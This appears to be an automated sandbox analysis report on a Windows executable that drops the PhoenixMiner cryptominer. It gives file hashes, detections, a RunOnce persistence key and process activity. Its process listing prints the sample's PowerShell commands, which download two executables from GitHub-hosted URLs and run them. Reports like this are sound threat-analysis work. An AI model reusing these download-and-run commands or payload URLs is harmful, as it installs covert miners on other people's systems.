Analysis
-
max time kernel
43s -
max time network
103s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
12-09-2022 20:06
Behavioral task
behavioral1
Sample
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
Resource
win10v2004-20220812-en
General
-
Target
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
-
Size
8.3MB
-
MD5
9ed9ad87a1564fbb5e1b652b3e7148c8
-
SHA1
0c001b7e9615cbc22eac2a324d8deb7eaf069ff7
-
SHA256
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89
-
SHA512
e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a
-
SSDEEP
196608:8eOr3LD6MZ+NL0j/YjNV4p9eLDZPhujwk8kAb+RWvqWd6qmgNSN:8TbnQYiN2eRPhSwhk8s46C4N
Malware Config
Extracted
https://raw.githubusercontent.com/jkh36/d/main/bild.exe
https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe
Signatures
-
Detectes Phoenix Miner Payload 6 IoCs
Processes:
yara_rule miner_phoenix \Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe miner_phoenix \Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe miner_phoenix \Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe miner_phoenix \Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe miner_phoenix C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe miner_phoenix -
Executes dropped EXE 1 IoCs
Processes:
PhoenixMiner.exepid process 1428 PhoenixMiner.exe -
Loads dropped DLL 4 IoCs
Processes:
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exepid process 1380 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe 1380 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe 1380 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe 1380 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
PhoenixMiner.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce PhoenixMiner.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" PhoenixMiner.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 784 powershell.exe 1280 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 784 powershell.exe Token: SeDebugPrivilege 1280 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exePhoenixMiner.exedescription pid process target process PID 1380 wrote to memory of 1428 1380 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 1380 wrote to memory of 1428 1380 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 1380 wrote to memory of 1428 1380 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 1380 wrote to memory of 1428 1380 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 1428 wrote to memory of 784 1428 PhoenixMiner.exe powershell.exe PID 1428 wrote to memory of 784 1428 PhoenixMiner.exe powershell.exe PID 1428 wrote to memory of 784 1428 PhoenixMiner.exe powershell.exe PID 1428 wrote to memory of 784 1428 PhoenixMiner.exe powershell.exe PID 1428 wrote to memory of 1280 1428 PhoenixMiner.exe powershell.exe PID 1428 wrote to memory of 1280 1428 PhoenixMiner.exe powershell.exe PID 1428 wrote to memory of 1280 1428 PhoenixMiner.exe powershell.exe PID 1428 wrote to memory of 1280 1428 PhoenixMiner.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Start-Process lWr.exe; Start-Process ck.exe;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exeFilesize
8.2MB
MD5c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD508898c7ecd1e321f48f632dab9d7887c
SHA1a5fa5a683d2c0ddcd228dcfa321f73f8c4db739b
SHA2561c382fc0a9bcb67fe7a2096503b2b6c5692ca2be2f7e11716aa844286278cb2f
SHA51299ade53530fc21f9524376b893bd53f917cde875a67475d7253b93e341a86ca23d95d323e79138057748a04e785d0bd4c0057e5cabe93b4ccb080bc43ac21c9f
-
\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exeFilesize
8.2MB
MD5c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17
-
\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exeFilesize
8.2MB
MD5c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17
-
\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exeFilesize
8.2MB
MD5c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17
-
\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exeFilesize
8.2MB
MD5c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17
-
memory/784-64-0x00000000737E0000-0x0000000073D8B000-memory.dmpFilesize
5.7MB
-
memory/784-61-0x0000000000000000-mapping.dmp
-
memory/784-63-0x00000000737E0000-0x0000000073D8B000-memory.dmpFilesize
5.7MB
-
memory/1280-65-0x0000000000000000-mapping.dmp
-
memory/1280-68-0x0000000072E60000-0x000000007340B000-memory.dmpFilesize
5.7MB
-
memory/1280-69-0x0000000072E60000-0x000000007340B000-memory.dmpFilesize
5.7MB
-
memory/1380-54-0x0000000075A11000-0x0000000075A13000-memory.dmpFilesize
8KB
-
memory/1428-59-0x0000000000000000-mapping.dmp